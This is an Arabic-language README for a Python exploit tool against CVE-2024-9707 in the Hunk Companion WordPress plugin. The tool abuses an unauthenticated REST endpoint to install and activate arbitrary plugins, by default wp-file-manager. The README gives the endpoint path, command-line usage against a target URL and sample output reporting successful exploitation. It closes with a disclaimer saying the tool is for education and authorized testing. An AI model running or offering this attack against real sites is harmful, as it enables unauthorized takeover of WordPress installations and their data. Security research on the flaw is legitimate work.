
هو Hunk Companion Plugin لـ WordPress: عرضة لتثبيت/تفعيل الإضافات غير المصرح به (الإصدارات حتى 1.8.4 ضمنًا)
هذا السكربت يستغل الثغرة الأمنية في البرنامج الإضافي Hunk Companion الخاص بووردبريس (CVE-2024-9707)، مما يسمح للمهاجمين غير المصرح لهم بتثبيت وتفعيل برامج إضافية عشوائية عبر نقطة نهاية REST API /wp-json/hc/v1/themehunk-import.
| الميزة | الوصف |
|---|---|
| كشف إصدار البرنامج الإضافي | يتحقق تلقائيًا من إصدار البرنامج الإضافي. |
| فحص الثغرة الأمنية | يحدد ما إذا كان الإصدار المكتشف معرضًا للخطر (<= 1.8.4). |
| تثبيت البرنامج الإضافي | يستغل الثغرة الأمنية لتثبيت وتفعيل برنامج إضافي محدد. |
requests, argparse.pip install requests
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site.
-p PLUGIN, --plugin PLUGIN
Plugin name (default: wp-file-manager).
2- قم بتشغيل السكربت
python CVE-2024-9707.py -u <TARGET_URL> [-p <PLUGIN_NAME>]
python CVE-2024-9707.py -u https://example.com -p wp-file-manager
Detected version: 1.8.4
The site is vulnerable. Proceeding with exploitation.
Plugin installed and activated successfully.
Response Status: 200
Response Body: "http:\/\/192.168.100.74\/wordpress"
هذا السكربت لأغراض تعليمية فقط. استخدمه بمسؤولية وعلى الأنظمة التي تملكها أو لديك إذن صريح لاختبارها فقط. المؤلفون غير مسؤولين عن أي سوء استخدام أو ضرر ناتج عن هذه الأداة. بواسطة: Khaled_alenazi | Nxploited